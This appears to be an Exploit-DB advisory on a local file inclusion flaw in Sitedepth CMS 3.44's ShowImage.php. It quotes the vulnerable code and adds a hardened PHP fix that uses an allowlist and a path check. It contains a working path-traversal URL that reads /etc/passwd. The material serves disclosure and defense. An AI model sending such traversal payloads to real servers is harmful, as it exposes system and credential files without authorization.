Vendor: Sitedepth CMS
By: H4 / Team XPK
CVSS: 7.5 (HIGH)
CWE: Local File Include (LFI)
Product Name: Sitedepth CMS
Affected Version From: Sitedepth CMS 3.44
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Sitedepth CMS 3.44 Local File Include LFI Exploit

Sitedepth CMS version 3.44 has a Local File Include vulnerability in ShowImage.php. The script appends the name request parameter to the repository path and passes the result to readfile() without validation, which allows an attacker to include arbitrary files from the server, potentially leading to remote code execution.

Mitigation:

The vendor has not provided a patch for this vulnerability. It is recommended to upgrade to a newer version of the CMS or implement proper input validation to prevent LFI attacks.
Source

Exploit-DB raw data:

__________________________________________________________________________

[*] Sitedepth CMS 3.44 Local File Include LFI Exploit       
__________________________________________________________________________

[!] Application homepage :   http://www.sitedepth.com/
[!] Author               :   H4 / Team XPK 
[!] Contact              :   H4_XPK@hotmail.com
[!] Bug discovered       :   2006-11-07
[!] Bug published        :   2007-06-25

---------------------------------------------------------------------

Vuln. code: ShowImage.php


<?php

  include 'sitedepth.php';
  $content_type = 'image/jpeg';
  $filename = SD_DIRS_REPOS . '/html/' . $_GET['name'];
  $filename_show = $_GET['name'];
  header ('Content-type: ' . $content_type);
  header ('Content-Disposition: inline;    filename=' . $filename_show);
  readfile ($filename);   // <-------------- BAD!
?>

---------------------------------------------------------------------

[!] Exploitation : http://noobie.com/sitedepth/ShowImage.php?name=../../../../../../../../etc/passwd

---------------------------------------------------------------------

[!] Sometimes it's time to give instead of taking :)

[!] Greetz to Angeldust & Streets and to rest of community.

# milw0rm.com [2007-06-25]
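
One way to implement the input validation recommended under Mitigation for the ShowImage.php logic quoted above, as an added example that is not Sitedepth's code or part of the original advisory. It assumes PHP 7.1 or later with the fileinfo extension; resolve_image_path() and the fallback SD_DIRS_REPOS value are hypothetical.

```php
<?php
// Assumption: SD_DIRS_REPOS is normally defined by sitedepth.php; the fallback
// below is a placeholder path so this file runs on its own.
if (!defined('SD_DIRS_REPOS')) {
    define('SD_DIRS_REPOS', __DIR__ . '/repos');
}

// Hypothetical helper: map a requested name to a file inside the image
// directory, or return null when the request must be refused.
function resolve_image_path(string $baseDir, $name): ?string
{
    // Reject arrays (?name[]=x), empty values and NUL bytes.
    if (!is_string($name) || $name === '' || strpos($name, "\0") !== false) {
        return null;
    }
    // Allowlist: a bare file name with an image extension, no path separators.
    if (!preg_match('/\A[A-Za-z0-9_-][A-Za-z0-9._-]*\.(jpe?g|png|gif)\z/i', $name)) {
        return null;
    }
    // Canonicalise both sides and confirm the file stays under the base
    // directory; this also catches symlinks that point elsewhere.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$path = resolve_image_path(SD_DIRS_REPOS . '/html', $_GET['name'] ?? null);
if ($path === null) {
    http_response_code(404);
    exit;
}

// Derive the content type from the file itself, not from the request.
$type = mime_content_type($path);
if (!in_array($type, ['image/jpeg', 'image/png', 'image/gif'], true)) {
    http_response_code(404);
    exit;
}
header('Content-Type: ' . $type);
header('X-Content-Type-Options: nosniff');
// basename($path) already matched the allowlist, so it holds no CR/LF or quotes.
header('Content-Disposition: inline; filename="' . basename($path) . '"');
readfile($path);
```

The allowlist alone rejects the ../ sequences shown in the advisory; the realpath() containment check is a second layer that still holds if the pattern is later loosened.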